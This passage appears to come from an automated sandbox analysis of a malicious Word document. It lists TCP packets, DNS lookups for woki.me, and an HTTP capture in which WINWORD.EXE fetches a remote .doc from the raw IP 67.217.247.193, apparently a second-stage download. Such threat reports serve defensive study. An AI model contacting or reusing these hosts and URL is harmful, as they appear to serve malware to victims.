                                                                                                                                                                                          Feb 16, 2025 21:05:44.054478884 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054512978 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054522038 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054522038 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054568052 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054637909 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054672003 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054688931 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054706097 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054712057 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054738998 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054754972 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054779053 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054790020 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.054825068 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055624962 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055659056 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055680990 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055694103 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055696964 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055726051 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055736065 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055761099 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055772066 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055794001 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055804014 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.055838108 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056574106 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056607008 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056633949 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056642056 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056647062 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056674957 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056682110 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056709051 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056718111 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056741953 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056798935 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.056838989 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.059456110 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.059508085 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140845060 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140897989 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140930891 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140944004 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140948057 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140980005 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.140990019 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141016006 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141024113 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141050100 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141057968 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141083956 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141093016 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141118050 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141133070 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141158104 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141257048 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141288996 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141308069 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141336918 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141355038 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141391993 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141401052 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141438961 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141444921 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141478062 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141484976 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141519070 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141530991 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141560078 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141582012 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141602993 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141926050 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141976118 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.141976118 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142018080 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142024994 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142056942 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142066956 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142091990 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142103910 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142124891 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142133951 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142159939 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142165899 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142193079 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142206907 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142227888 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142241001 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142271042 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142596006 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142632961 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142646074 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142668009 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142673969 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142708063 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142718077 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142751932 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142760038 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142785072 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142798901 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142818928 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142826080 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142852068 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142860889 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142888069 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142896891 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142920971 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142931938 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142956018 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142970085 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142991066 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.142997980 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143033981 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143381119 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143476009 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143517017 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143551111 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143568993 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143584967 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143589973 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143619061 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143625021 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143657923 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143666029 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143707991 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143712044 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143740892 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143759012 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143774986 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143785954 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143809080 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.143857956 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.146040916 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.146101952 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.186124086 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.186175108 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.186211109 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.186285973 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.186285973 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.227978945 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228049994 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228074074 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228085995 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228097916 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228120089 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228128910 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228154898 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228163958 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228199959 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228207111 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228243113 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228276968 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228300095 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228312016 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228312969 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228341103 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228374958 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228389978 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228408098 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228420973 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228444099 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228452921 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228478909 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228485107 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228513956 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228527069 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228548050 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228554010 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228584051 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228588104 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228617907 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228631020 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228652954 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228660107 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228688002 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228708982 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228720903 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228733063 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228755951 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228773117 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228785038 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228797913 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228818893 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228830099 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228852987 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228864908 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228888035 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228902102 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228923082 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228926897 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.228972912 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:44.299864054 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.299953938 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.301693916 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.308706999 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.308743000 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.959239006 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.959331989 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.960913897 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.960942030 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.961469889 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.961534977 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.962373972 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.962515116 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:44.962614059 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:44.962928057 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:45.247124910 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:45.247242928 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:45.247312069 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:45.247354984 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:45.247375011 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:45.247402906 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:45.394478083 CET53982443192.168.2.24142.132.211.198
                                                                                                                                                                                          Feb 16, 2025 21:05:45.394558907 CET44353982142.132.211.198192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:45.525504112 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:45.530388117 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:45.688709021 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:45.688775063 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:47.578135967 CET805397767.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:47.580485106 CET5397780192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:50.687418938 CET805397967.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:50.687547922 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:52.207025051 CET5397780192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:52.211945057 CET805397767.217.247.193192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:52.233223915 CET53985443192.168.2.242.22.242.9
                                                                                                                                                                                          Feb 16, 2025 21:05:52.233287096 CET443539852.22.242.9192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:52.233370066 CET53985443192.168.2.242.22.242.9
                                                                                                                                                                                          Feb 16, 2025 21:05:52.233812094 CET53985443192.168.2.242.22.242.9
                                                                                                                                                                                          Feb 16, 2025 21:05:52.233845949 CET443539852.22.242.9192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:52.885207891 CET443539852.22.242.9192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:52.885310888 CET53985443192.168.2.242.22.242.9
                                                                                                                                                                                          Feb 16, 2025 21:05:59.871097088 CET5938553192.168.2.24162.159.36.2
                                                                                                                                                                                          Feb 16, 2025 21:05:59.876264095 CET5359385162.159.36.2192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:59.876401901 CET5938553192.168.2.24162.159.36.2
                                                                                                                                                                                          Feb 16, 2025 21:05:59.881510973 CET5359385162.159.36.2192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:06:00.332016945 CET5938553192.168.2.24162.159.36.2
                                                                                                                                                                                          Feb 16, 2025 21:06:00.337558985 CET5359385162.159.36.2192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:06:00.337645054 CET5938553192.168.2.24162.159.36.2
                                                                                                                                                                                          Feb 16, 2025 21:06:05.934015036 CET5397980192.168.2.2467.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:06:05.934210062 CET53985443192.168.2.242.22.242.9
                                                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                          Feb 16, 2025 21:05:38.938818932 CET5900053192.168.2.241.1.1.1
                                                                                                                                                                                          Feb 16, 2025 21:05:38.960496902 CET53590001.1.1.1192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:05:59.870580912 CET5349263162.159.36.2192.168.2.24
                                                                                                                                                                                          Feb 16, 2025 21:06:00.335900068 CET5900053192.168.2.241.1.1.1
                                                                                                                                                                                          Feb 16, 2025 21:06:00.343868017 CET53590001.1.1.1192.168.2.24

                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                          Feb 16, 2025 21:05:38.938818932 CET192.168.2.241.1.1.10xb948Standard query (0)woki.meA (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:06:00.335900068 CET192.168.2.241.1.1.10x127fStandard query (0)198.187.3.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                          DNS Answers

                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                          Feb 16, 2025 21:05:35.122253895 CET1.1.1.1192.168.2.240x91beNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:35.122253895 CET1.1.1.1192.168.2.240x91beNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:35.122253895 CET1.1.1.1192.168.2.240x91beNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:38.960496902 CET1.1.1.1192.168.2.240xb948No error (0)woki.me142.132.211.198A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:52.232392073 CET1.1.1.1192.168.2.240x473bNo error (0)res-stls-prod.edgesuite.net.globalredir.akadns88.neta726.dscd.akamai.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:52.232392073 CET1.1.1.1192.168.2.240x473bNo error (0)a726.dscd.akamai.net2.22.242.9A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:52.232392073 CET1.1.1.1192.168.2.240x473bNo error (0)a726.dscd.akamai.net2.22.242.145A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:52.232392073 CET1.1.1.1192.168.2.240x473bNo error (0)a726.dscd.akamai.net2.22.242.131A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:52.232392073 CET1.1.1.1192.168.2.240x473bNo error (0)a726.dscd.akamai.net2.22.242.128A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:05:52.232392073 CET1.1.1.1192.168.2.240x473bNo error (0)a726.dscd.akamai.net2.22.242.138A (IP address)IN (0x0001)false
                                                                                                                                                                                          Feb 16, 2025 21:06:00.343868017 CET1.1.1.1192.168.2.240x127fName error (3)198.187.3.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                                                                          HTTP Request Dependency Graph

                                                                                                                                                                                          • woki.me
                                                                                                                                                                                          • 67.217.247.193

                                                                                                                                                                                          HTTP Packets

                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                          0192.168.2.245397767.217.247.193805956C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                          Feb 16, 2025 21:05:41.888931990 CET462OUTHEAD /318/semina/sem/nicepersonwithgoodheartalwaysgethurt__________nicepersonwithgoodheartalwaysgethurt_________nicepersonwithgoodheartalwaysgethurtniceperson.doc HTTP/1.1
                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                          Authorization: Bearer
                                                                                                                                                                                          User-Agent: Microsoft Office Word 2014
                                                                                                                                                                                          X-Office-Major-Version: 16
                                                                                                                                                                                          X-MS-CookieUri-Requested: t
                                                                                                                                                                                          X-FeatureVersion: 1
                                                                                                                                                                                          Accept-Auth: badger,Wlid1.1,Bearer,Basic,NTLM,Digest,Kerberos,Negotiate,Nego2
                                                                                                                                                                                          X-IDCRL_ACCEPTED: t
                                                                                                                                                                                          Host: 67.217.247.193
                                                                                                                                                                                          Feb 16, 2025 21:05:42.430109978 CET323INHTTP/1.1 200 OK
                                                                                                                                                                                          Date: Sun, 16 Feb 2025 20:05:42 GMT
                                                                                                                                                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                          Last-Modified: Thu, 13 Feb 2025 09:03:23 GMT
                                                                                                                                                                                          ETag: "20059-62e02548dfd9c"
